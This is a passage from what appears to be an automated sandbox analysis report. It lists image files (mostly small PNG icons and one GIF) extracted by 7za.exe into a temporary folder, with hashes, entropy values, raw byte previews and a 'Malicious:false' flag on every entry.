      Preview:.PNG........IHDR.............R|.....AiCCPICC Profile..H...wTS....7..." %..z. .;H..Q.I.P...&vD.F..)VdT..G."cE....b....P..QDE..k..5....Y.....g.}..P....tX..4.X....\..........X...ff.G.D....=...H.....d..,.P&s...."7C$...E.6<~&....S...2.....)2.12....."..l...+...&..Y...4...P.%...\.%.g.|.e.TI....(....L.0.._..&.l.2E.........9.r...9h..x.g...Ib...i...f..S.b1+..M.xL.....0...o.E.%Ym.h.....Y..h.....~S.=.z.U.&..A..Y.l./....$Z.....U..m.@..O. .........l^....'....ls..k.+.7...o..9.....V;..?.#I.3eE..KD......d......9i...,......UQ....h..<.X..d.......6'..~.k.hu_.}.9P.I..o=.C#.$n?z.}.[.1...h...s.2z.....\.n.LA"S....dr%.,...l.....t..4..0.,`...3p.. ...H.....H.i@..A>...A1..v.jp..z..N.6p.\.W..p...G@...K0..i......A......B...Z.yCAP8...C....@..&..*...CP=.#t...]..... 4...}.....a......;..G...Dx.......J..>........,._..@....FX...DB.X$..!k."...E.......H.q.....a......Y..bVa.bJ0.c.VL..6f.3....b..X'.?v.6...-.V`.`[.....a.;.......p~..\2n5...........&.x.*.....s.b|!.........'..Z.k..!. $l$T
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 23, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):651
      Entropy (8bit):7.6282198605812415
      Encrypted:false
      SSDEEP:
      MD5:133217187C12B6198705FD2529964000
      SHA1:E3C375BDF8434BFA6AFB24CF296E4EB3BD671A77
      SHA-256:A4B040100F64A8BBD7719DAEC7091D51494B30E664B712F877AF3C2F1137769D
      SHA-512:E2374473E159840B76C89E5782D5B0EECC2C6D1DD10735C63026551716E1DF8E5A7D870FB0704D2149D83DDE2DCDC241A9604A765DE644B41ED4D3B9E5543398
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............!.-...RIDATH...;H.Q....M|.D4 ...DC.......L.Qbak..*)"...BI.`.X.....: .A..D..@T.~......>X..=sf...z.G..t.n..@..z@./..y....W..tBy(.....[X..P8.......]0...Q........N?...'LA..GO.............{..0..6..|.......e....E2...J...h.+.t&.o.Ft........xs.~....'.M....g......d..(.Y.Z. ..n..\.3.....Y].L........a.....z......3g.k..y.L=...M....d..(P ..}#P.>..0....v.g...1..lQ..D._U...K..e7.o..&...!J2[.7P..QQ..........E....V$q...8Vs..O.x}G..F.t.N.6F..s..N.q..1.T...a.~...&...`Sg...8.5......l.5...+Px....3.:.J(..].|..[..`.....3_......$..C..Z.\..u.4.r/.\6g....yEf.X-3.v.f..(+....(..G.wpF.C.....S'..".?....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):202
      Entropy (8bit):6.277050181775769
      Encrypted:false
      SSDEEP:
      MD5:F6B8053C7568C9319A80C1A5788C2F57
      SHA1:AA9488C3B1C91074C2A242FFE7CA1A18EA703450
      SHA-256:C7FADAAA3ADFED35983885AA121C6204F6C23349B207A974F7F09855897656A5
      SHA-512:73C02EBDFEF2C03A123BFE6EF3FBBF7259EDB670FC298176C8F032AC6FCBCF9905C0D5026F64B82BE20143EB439C3C36C3AD69F7A6C4BEA9798C117856F87610
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...lIDATx.b`....3g.......,Dj6.R.8.]...b.,..@.......@...4.I3.....'`s.#...4]....5........?.)G.F v....u.h..... ...."|=.j>....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 23 x 23, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):369
      Entropy (8bit):7.133957308079664
      Encrypted:false
      SSDEEP:
      MD5:BB45727E6279FD098230121F9DBB0D0E
      SHA1:8CEB917F576A039937AC303A6871B9765E4DA664
      SHA-256:244965FEAE7E7CA8597B7AC46C3E129ABB786915B9484807EAB983F8396B4B66
      SHA-512:AD5EEA3009FDD442F9A3F7E93C82E33A913B057ABFA97F03A6B60C6EA83611BA1CF1DCAB290B212A56556C725453DAC4AB3AC6E162207CA04ED4A9CFB34FC778
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............*.....pHYs...........~....#IDATH..]m.0....0.C8.a.@0.B0.@8.......5.....+.lN.RK..{.../$q....+.p.........d..$3..VH...g.U...(.*H2..6..c.>...M.z.k@r.X..h....c.,...o.4\..z.z5...<K.V..4.&..U8...E..|T.../&.M.=.n.<..q.._n5.{.L.................7s...g.L...IUjIs......<...I..5..C.....U...4{o.a..V....r)O..7..h..!.....s.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 200 x 200
      Category:dropped
      Size (bytes):51844
      Entropy (8bit):7.040633479861742
      Encrypted:false
      SSDEEP:
      MD5:40EE9967D6C6A465DCD701EFDCD62828
      SHA1:1453D976516BE395E07D5785420F6234F4D7F130
      SHA-256:E869DD22797304C3FC77971C6436970817D7F2FAD7DC793D14B5F3F66FC44C80
      SHA-512:185670365DC0AEFB2CAB6BDC0EA52957A0FBA9D48A59DB668E9660872C075C3995B7114F6D18C34DC4D7936D5EC926143ABCC59F4130C40086047DE5E8A72200
      Malicious:false
      Reputation:low
      Preview:GIF89a..........,,,nnnhhhffffffffffffffffffffffffffffffffffffjjjqqqwwwxxxxxxxxxxxxxxxxxxxxxxxxyyyzzz|||......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,............K..H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L......t..b.y>..y...:/c.y...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 23 x 23, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):349
      Entropy (8bit):7.072211434384849
      Encrypted:false
      SSDEEP:
      MD5:8692F4C936C3150A6D98CB7504AA3534
      SHA1:05C803A9DA5CB6BEFCB60D592A304A455442C5CE
      SHA-256:96BE2655CE4A3C6FB3E0F8EB7A19CC79F198085F783D4F83E4F5D1A17B1254AD
      SHA-512:11520EF5626805603AF4D4F1857CBFCB90BCD2F043ABB9E5C5B805A39462B41720D598F4A05F0EE35AD099846ABE7F847CB6926614331BC8F9F5F73A7522BA4A
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............*....$IDATH......@.E.@...EP...BB.$..KNDW.5@@B..p......#..A.k.k..7.k.....E...P....U....LE%....L.)..".e79bVx.-...........!...^....Bu....PS.x.....u....R.....S.rpN$T.hn.,....cX........f.G]@._.............F..~..EBu...%.....gh]..0...aD...>4C...... N.-t.{+>.SS`?...[..<CG.a....N...E....{.......rw[......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 9 x 5, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):180
      Entropy (8bit):6.162543009951917
      Encrypted:false
      SSDEEP:
      MD5:BEA5005AFAC0E9E3283DE3B925D63FD2
      SHA1:4E054EB29A9621B8A08033F1F0755D69302D0AC2
      SHA-256:6D569E8011BCD3DA7D20D33FDE59A15C308445C2B48866B43C570D0602B1A2FD
      SHA-512:31FCC90C769FB05F1061DFEDD668248DAEEAC0215498B8168899DE7C8194AA7FC57E7BBE81141694A806D9FBC79D4B734175553F8BE231D4EA8656175A7AA335
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............S.k....pHYs...........~....fIDAT..].1..P.../Q..$<.8......h.7<....P..d..5...0MS.1..nUu.<.GU...q.1.+.....-.gX.e3/x..[.7.[>I_.......$..g.!....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 15 x 15, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):349
      Entropy (8bit):7.09270314045919
      Encrypted:false
      SSDEEP:
      MD5:2ED380B10A1F38A1ADB02F085235D7AB
      SHA1:B8FEB809B76A60AA317C0674EC847961889DD15B
      SHA-256:C6BB324DC5D3DC5A7798B0D41B77109BC5BE0E84C4E03DBE122775C0627A3C94
      SHA-512:412195F66CE95256D47FD6E2FBBE21336D8274E80FD2CD7BE3EBF200DC07A42CEB7A1EF8E76B27845F38C59B5212916196BA1B1E6412E068204F15C9AC7283BC
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............;.J....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.S;..@.e...#..4........V9....Ki..hi...DO .....I..L../y..y.a.U..a..a..$M.H.LC...g:..N>....1.a......\.%&I..I...>....}.S.....F..ry\.....(....z`.....6.s`.&....}Z.MU..0O...wD.......`....L.)..;.A...k.5u..v.E4...m....Q....#qt;....,.:...C....b.........K...3....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 15 x 15, 8-bit gray+alpha, non-interlaced
      Category:dropped
      Size (bytes):166
      Entropy (8bit):6.249126882374077
      Encrypted:false
      SSDEEP:
      MD5:2BCDEA22ABF28B8CA33E849DB38C8CF0
      SHA1:09B91C715E41332D8243F064F7CBC9DB8087C1F8
      SHA-256:D1874598F2CA99CF96E1EB17D77C914586EAC497ADB5A67D5FB685CD65C166EB
      SHA-512:878A701A95CD7F51794BDDC99A2B0FF2E736D55EE13EC5FB3E998012620DC1E844EE0A81A84E47D00DBB01F3443A53887DCF8FB43B6A190D5B334CC8244E9BFC
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...............]....mIDAT..c`....3..a..60s=Tz?.p.P"...=T.=....+.I.........3.......A....9 ...d8L...-.0.@..\$."...M.n....o..F0......C..Q.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):426
      Entropy (8bit):7.252779215332215
      Encrypted:false
      SSDEEP:
      MD5:FE8F79F2AA6887CC155478C1B2BB8A9D
      SHA1:0566D93CD7ACE6F43D330F2ACFF6BD6DDB8E50D6
      SHA-256:4D255348C5462408FF1A9EAAB744E82CAB23BCE5024D29C658905937182735D0
      SHA-512:52CDB14DDE227ADA2B3D6DF6DE265D5B76C643AC2AAFCD2F9C7F931F654F84C675F0ABD55CBDF94AA7CF57C9513F2AE2F0F064B61C5DC3032B759F61AD659165
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...LIDATx.tS.q.@.]vR.v..A.. PA..WO*.. ...P...p....@.y.y..e.....V.M...,w8..7.u.4.6&.(.........{..$..>...<.y..Bw$..B......)7.0d..."...M.x...8...{frd......qBX._....b../..gA..ImH....r.`....L`..'..g.U..1'....NA.?8..=J............S.........L`.,O.`6v..N...7.d.}......<;;.@.m$.5......6......j..j..'Qa.S..Y..q.m.G..<.O......s..`..w..|..%....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced
      Category:dropped
      Size (bytes):260
      Entropy (8bit):6.919806775591421
      Encrypted:false
      SSDEEP:
      MD5:A42CCA03383138F026F43CF9C0A36AA6
      SHA1:D824C5F216D19D7AAE70A92F8B8BB7986D88F8B3
      SHA-256:29624620F0FD8B8904418A8248B90E5CAC58904C07C5F2EB6C29BE510D0121AA
      SHA-512:15FB38E0D11111AF4D0AA6237EC0BE0A90F692093D7C78FFC955643938669F74C3C16937061B9BBA0D02C8E8576CC9F6295977E6C17275401F306DB2CE446277
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...............7.....IDAT(.M.A.. ..#..H..Ix...K....i.&.....$......IH.Jq(..e..c.]".q......d2..3..qKT.:N.p..M..q....$......O.\1..\8Y.H..........zl...\<.^zI..gD.o........Q'.B.e>J..V.Rt.C.....m.8.+...I1:..E...u..h...&x.........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 28 x 28, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):535
      Entropy (8bit):7.387243707260639
      Encrypted:false
      SSDEEP:
      MD5:A264A6D6063ACE611B9846D7491BC7E1
      SHA1:95B7A780EEAEC96D1019B78187EEF750806C3FE2
      SHA-256:89AB53E927068F448F1313FF98AC9E25F798D98EE4D1D50F303673D5B03A04E5
      SHA-512:4C2392ED5724475A9BE76A6B58E7015819AA49352156208A58E58B0DDC1D9066D5718BE62EBDA002877DD1ABFA32E6A63ACBAFAA0CCB216E6280484CF9E20D2D
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............r......pHYs...%...%.IR$.....IDATH...Q.@..?2...t`*.X..V...L:.\..X............._.c..`H............l6..8.j#...x....l..%....=.....s`........k.C.\.L.%0.,.J=3 ..{...7.J.~.......`..!..Z...J.lnf..6.|..&.a....u..I.D...n.:4{`sm....}`.....E6}.\.c3+.....FI.........vPa....r....(..:.;.g/......x.P3..V.ca>......O._.w.XP.L1..^.{yl.ui.X.|.v+.j...Lc...+,.....0T.&u`!.'j........D.Y....,N..ZM-h.Xxh....N..,..>.....l_....P....+.....2.........T..*..t..ma.8.h*5.j-..(>e.ma.Z.\..[.....%..X.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 13 x 7, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):224
      Entropy (8bit):6.52280041761694
      Encrypted:false
      SSDEEP:
      MD5:0FB939BE5C3BD7F6CFA4668C99CCA281
      SHA1:4727BD48A6BBB94FF70EA46FDD86E418818ABD92
      SHA-256:3ABA1D039EBC5170AC4B28D0C3544A0A75A9FE4356C9562564C9DBD8C7975FC5
      SHA-512:6AB5F6FE9BE4D08E938389D6396A2AD3E192B0D350D23F016F7FA4D29D08DCC4BC385A24FD1814FE0F556B1F45D76D68A486D5B7683BF5CB9441CA50B87090C3
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............p......pHYs...........~.....IDAT......0.D...:.d.P.......0A`.2B*.$.d..4..B($.I.:.;..I.q1W.......aC...x.c).\.M...@.L..Wr1...H.......,..K.6..$..C....o.06..,\.....b..w.h.....<,Ek........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):576
      Entropy (8bit):7.512384367694666
      Encrypted:false
      SSDEEP:
      MD5:1BFC1260C10A19DAE497B848084DE792
      SHA1:972760856573ABDDDAFEB5C3CD7D8E45238604A0
      SHA-256:245785718D7FCF1FA3D63BC7CE7EFCBFE94F61A4804C09C6111D51E2B93852E5
      SHA-512:5488266388E119470ECB65F61ABD399BE3ED0E5ED9111D34C8C01AAF0DD4DF838185F8FA891EE692C234CF2DCB131B1EFB04A0A27C50DE76E17C88E4B02661A9
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................U....pHYs...%...%.IR$.....IDATH.....P..?{...`.`.cN8..;XSA.S.. .....[.'L....:0......d.aQ.H.......3..?...{.....L.`-..j...)0w....Y..j3.]...w..x._k`.4.....}.v.....t....!..t..].}`+.=.....y......l..O;>...6.r(...M.o.;Q@/..W.d....U.n.......:...V.Zu....r...%(.N..1.....%.PV5:.........n.$...`.......<.3../.....x.\.n..}V6..^.....l......R`....M.K.>./.......j..&E.]...0.$.|#F..w....M.....*.Hz....A.a.5P.*.R2..2.L.u..n...O+.....S...t.0.6.95......~.q.....|:.7....7.9.^....%...m..\.....#...h<.T....J.*CjG...u..C'.."..UC,'.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 28 x 28, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):552
      Entropy (8bit):7.444644794878746
      Encrypted:false
      SSDEEP:
      MD5:34C6D3D78F78DC5181935FE42B65A003
      SHA1:5AF0EC549E02F292AD68CD8E3A8579FCFE85C25F
      SHA-256:03DC1A8F4EA97C2457A26239CD783A1703F8D7A88EFA9953BB37A0A246C11E6E
      SHA-512:D2B3BF0C30C1CA89DA2153F22C28F256C97483FED6485897630A53DBC53AB7CC4FCF6729D7488612C58F097AF49010458BDEFAF176A6C7687E80B70AB69C610C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............r......pHYs...%...%.IR$.....IDATH...M.@...D.c.B.x.X...`*......T....V..... <!..}...Z&7...J.x.9......v...wO..=).....t@cf..f_.P.B.)....<.....W.X....{.<........m.y...@nf.u.........5..#p.}..l....Ug.9`f.k..p...=..G'..F?....;..........H..(H.}._.{.:>xH.T...m.oa%..U`.....M.=t..{......].%...Z..(.S.23{Q..q.Lm/..1.]....2L...9.0...{1!0U....E...y..}u1.Q.J&`........n-..P*.J.V>6wO.\...2L.\Z.p..n.R....JP...w....@>....g..{.^..d....M#B.F....#k2iu.b..Y..x!.u4.6.U4)..m!.VfV.<...E..-u.zl4..8R5b].M....;...l[......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 21 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):428
      Entropy (8bit):7.339712809680326
      Encrypted:false
      SSDEEP:
      MD5:953525D627546A0F0C16030E2EC28E69
      SHA1:0B5DDD32235158A144218F235F960828FA6B4F38
      SHA-256:763944542F5AFF05858011AC5FE840F94562FCF29882989C3CF23A488FBFD3F6
      SHA-512:078EFB044A484C7A10F1087BBA4787FECA23CAD3801535FE8E60404CA379E3325343B157BAC783C2DB0F3ADA4797599941A54101FA1CB4FCA9C99B23CC124FFD
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................H...sIDAT8..J.P...!.`....[..|.AA\.}..Y.N.>.t..P.....v3. ..b.}.mHso..q.<....rs.Mbf.$."Cz...e0.W.o...^QS.@zD..Sp..'..rI!\..o.o..`......CkO.9y.,....|+.V..|b.;jg..A....^A.....N...+.ul..H%.....z.w...A..:.DHn...$82>...s...s..qi..P...).:..}Zb..HC.43m@Z^p...Y.I5....[`n...!....e.OH...Li..e7).!7...".F..-...S.......Xy.wg.=...V..s.. .p.".@..!h.x...%>...........?.....wa.e.6....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 5 x 19, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):236
      Entropy (8bit):6.604512726079575
      Encrypted:false
      SSDEEP:
      MD5:E8F9E3A9CAF0EBF213C448EF46C8E11E
      SHA1:2BC0902B87CE6BAB0E9818B1065239FE0563A049
      SHA-256:3208148C88647161239EF5C86E699085953F32E3546AFAD7A29CBC485128BE02
      SHA-512:3242DC6F8625D9D94DC74949BEF088F76B5C510641B214E8AFB2DC881554CBCDA77D443F0788BC93C5071D34A55346F9E85DE66C2B0E7A9FE708CCE463D51080
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............X..c....pHYs...........~.....IDAT......0.....RBJ.%...%..t..@......(.t.*0..."....V;w........`f.p.s.:6...}.J....>...R....r0............J...R.(.....R._..`f.?;..>..7.9D.lN.....M...4?9.c.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 10 x 6, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):177
      Entropy (8bit):6.052943227897925
      Encrypted:false
      SSDEEP:
      MD5:5426437801A1BA94BDE2A04FDECC8B14
      SHA1:59ED25F44A966707E388AE23A13016A7B27FA2D8
      SHA-256:C856CCD26C814F800DADB7C44317F1B6728EA71B5A87E1A9B549E424B425A9C7
      SHA-512:F861129FC32982336C82EA8672DFEB39EA8789CB2A9079F68FFE0ECB541A8A339FC7D13A7BE6228EA790EC4AB879990361D32B27BBC14C4285842B63D5FFA35D
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...SIDATx.b.9s.y..........p...x........?.Q........d\.R.X..B...`"@..@..IQ#T.;.zn>.......6...*../....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 10 x 6, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):189
      Entropy (8bit):6.333483851566124
      Encrypted:false
      SSDEEP:
      MD5:9197C8EA5109DCDE975093A24A9EC929
      SHA1:E08AA12FD2D361E7361ACFDD1194C9D67164FB81
      SHA-256:B1D0472A374C25012F2FBA13B97DA7AC21A4CF86E41CD6BF9282EE1DF52DCB4C
      SHA-512:545EA5DA8CE3D0E7664E377C306C6563A39158BAE3B095E25F60998ECC69115B8237DDC5BA57A93765DE9938C13B32948E69A587338C7B2CC9D2C96EDB7AE333
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<..._IDATx.bLKK;...`...\`...@..."..#.Y.>.Q....a...=.....%....0..h......*..T..d:@....&.t..s.A.]. ..(...{......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 650 x 627, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):205793
      Entropy (8bit):7.994488824352073
      Encrypted:true
      SSDEEP:
      MD5:619E058B62083BD43C871EE9F67977BB
      SHA1:363066DB82258524077B510B7E10750CCB6D11F4
      SHA-256:7ABD43548E64767AE710198FB53CB9DE49194429B2F6C737F806C3C0070A6E4C
      SHA-512:3FD65E936B9A9FCB8389EDBF41379529EEC87613FF2940DE548CA44A6A83D3678994441E640F6F27EFA77EE22160DBCACD8F00241122FF52D32673F4C151D964
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......s.......2]....sRGB.......@.IDATx......y&.y.........$$. )R6%A...4.l......g.].-k.${gm?..)....].{....sh.wv....W6%..zl.l..dB.EqD." .d..G]y......U.].}Uu.I..232./"23......(..."08.q.tdv..c_w..E@.8@....-..E@.P...E@.P....D.....(E@.P..,...|.`.wri)...+.$.L(:.....H7E@.8..(.x .Q...(..."..(....#.,.w.h-Q.P......0.....B.p...L...#.!FQ.F.JSE@..c..Q...S...E@.P...E@..M..Q.Mt.lE@.8(.8.~.m..|..4W*...40a....a..>b...#....*..."0..(.8..."*..."..(..."......~..u*....!........<2...Gq...1S...i..9.Rs~~........8.}..8v}..+....2.....vE@.P...E@.P.6A@u.7.GO)..."..@4...x.b......z.O.x...*2...n.|l..F.fN2......s..)..U...E`..PFq..C.Q...E@.P...E`d..FF..D.P...QE.q..*.b3..).sJA....b.Y..5!..a..Tr..Z......C.........w....7............(....(&P..E@.P...E@.P...4.j..FC.+...".....2.t.^h.nw..V.3...KJ.&2./..c...X.XG..E.....v.O-zX.P....B@......F.P...E@.P....A@.....D.P.F........*2..3../\........ .h6.i|...a..2..O...p...T.P....E@.....L.P...E@.P....E@...._kW...q@...R..-...)..A.pun....L..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):433
      Entropy (8bit):7.306852698793839
      Encrypted:false
      SSDEEP:
      MD5:2F4FE56BC41A25139099B5F7AAE6B014
      SHA1:4A3EDA17D9568F26460B655DD3B1D8D848683DFC
      SHA-256:712FBC16B85D2F49D023E53799CB74FF596A3D8782E2690314BBB2C943D867A2
      SHA-512:31183B262D7438755408B233B82DF70991060A5CF120EAC8FC33A768693638178A0B0A1B1A26821E9A184B14DB54CF53BFB3056CF781D03FFEFD0A85F03CA26C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............l;....sRGB........kIDAT8..=/DA....EV.t..h5.....Hd.[Q....'(.P(4.Q,.&....7(.&....yeF....zO..y.y.Nfn...7`.).@.y7WtEJ^......i..;w.......0.0.+g].6..J.....G..5.2.......!,G..5...A..].3QO.....]?13....8....q..VS.C...j..;.y.t.ux..X..h.A0.g.Z}?.X.......].GV.. ..|XMWP...........\..A...IN.$ks......_0.m........g..).5..r..../x.%..}.Z..B....5.;.7.~..=pg!.T.\.+..z...S.B......z.^._..d..%......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):379
      Entropy (8bit):7.242532898393679
      Encrypted:false
      SSDEEP:
      MD5:EED645848DA0A5E679D88A546517220A
      SHA1:B61B0C04A3B81562089BC49D28101D5929A62391
      SHA-256:3BF795282FCCF7070BE0125E5179EC80B67EB67916AF1F147E869F32CDFF6B40
      SHA-512:8B8E12A1838ACE93E28E17C977ACEC83C90F5464E6A1698C0AC106B22C665D7041551765A7105E2B3B5C8EBC8F79A02EAA715063E7382896D3EEA0E8B0C0B397
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............l;....sRGB........5IDAT8..1N.A..Y%.cA.V&.D,..Y..l......'....R.X..p..$$x......M^2Yg.e.....y..cw..RiO..r.$Q.5../<..hA,..U..]M....j1..DrA/.C....>...TC...Qo...w....e....xjs!..5:1vrm...|..l.lIF.J....+>.}l..|.X...q^}......B...Df.B{...y..]@..nq...J..).E..._,..M..j..w....Ib~".V......Ag..`.=8.o......3....+ ..-|.?..._...~.....>?......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):595
      Entropy (8bit):7.444206405841779
      Encrypted:false
      SSDEEP:
      MD5:CEF15CCB3E06455F6984F8A9EFCDCF49
      SHA1:2408439B6B28440C103837CCDAA37CB3288ED899
      SHA-256:AC674DE32B6147C68987FD1936F846160649477B7F956002DF87AD2884806533
      SHA-512:FA0DA363CB909771FECA6C8F76C7037417F3B2A960C92435E2153FDACC5915F7AC034C2EB805EEF3B8E88223B92EDA39697BEBF5B3E2CBDD813A2B80427728D0
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...-...-.....:......pHYs...%...%.IR$.....IDATX..Y.q. .\i.o..T`u`... J.I..;p.q.V.t.........x..0`.3.....-.w....h(..3.Lz.XD<[.p.-...-..$.K.%...8....~@D..:rc...fED......j"...PNn.##Vr.V.S.+..d.0.<...x....p....3Xs/R....1..JW.HW.63r...OiQy.g...m......X..V..-...mkL..6.+<?.+.zT...'.(..]..q........5..-1<X.leQ....;...%D....T.&..ED.9.#T..j..d.*%.t.....N....u..>...(.\..JC.[-<..^..M/.....&'....r...V{..R.C.V1.&....W....>.=b&..v..K...4O9...H..>..M.p.....E|{P..;.V.....T.?.B&yK.%T.:.<...!.D8....i.!>AH.,..v,.....8.....&[.%m..(.3.L:..5...bg}Q.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 10 x 7, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):150
      Entropy (8bit):5.797213639264882
      Encrypted:false
      SSDEEP:
      MD5:94C2FD47934ED508287B76DE9F35226A
      SHA1:4DAF968A200141383987742B400FB5733BF7D147
      SHA-256:68EE0747ECAFA99B43BD0A8CCD2EDA3AA50E5CE421F6CF18C93513395DE957D6
      SHA-512:F6D3596F560F96ACAE92AAD91F02545D09252D759994C6027A7B173A47CFDEC57A6ACAAED56C25F85999F840B7F5AA279080D6F78C2BB695328E26A5A4AD3B25
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............1..c....sRGB........PIDAT..c....T &..2.U...n<*Ar,. .d...M,.Ab.`E0.(.......j0y..(......E...T.....D....k.E.W....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):531
      Entropy (8bit):7.477981530354021
      Encrypted:false
      SSDEEP:
      MD5:348CEA76BB635797E5A362FD63AF7FD3
      SHA1:316C287C2EBBC99756A403C409AB698536A8F5F5
      SHA-256:3C07E054DA68285B67FD0EB485D42B8DB5BB64C4096100FA4E890563E4E63FCC
      SHA-512:2E2F684DD77A3FEFB682280D7FF36EB41E7A3240034FE7727B4C173C4BB73C88CF5A997437CF022D1DD6827634AF7CA3808612738E37311FCBA3A7B16185E2F0
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............V.W....sRGB.........IDAT8.m..+DQ..M~.LYX..5D...b...,lh.6...X...0&l-......RI~da#....i|.o......s...{.}..QW.a.Je..p..P2..L..D.....-.z.uSPO.p..(.AO>.}..Y.. ^..g\..|....5.$.. .g.`.i....B'\...HNa.,.%...h.#d..d.../B.&...?..7.a..!l/....@..T..Shtb..5...uy...+...PQ..........A.T.5..-...'......1.E..../..)...@.vb..wX4..v.#.+...t..........3-.._..m&n3.u+.=.n=.8.4h.\.=.q...".."O..O.....C.].`.>z...D...IzA.3.A.@@.k..y.]X.v9.u.I...D..QW.C.....x........Q.!.w..d..R.....0.XZ._.Y..=.....u`....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):628
      Entropy (8bit):7.55547944848955
      Encrypted:false
      SSDEEP:
      MD5:2EEC9DC8AFBFDECA194A057CD3409A85
      SHA1:3E85D53E4BAB3E6C43912C257720FD44464ACC29
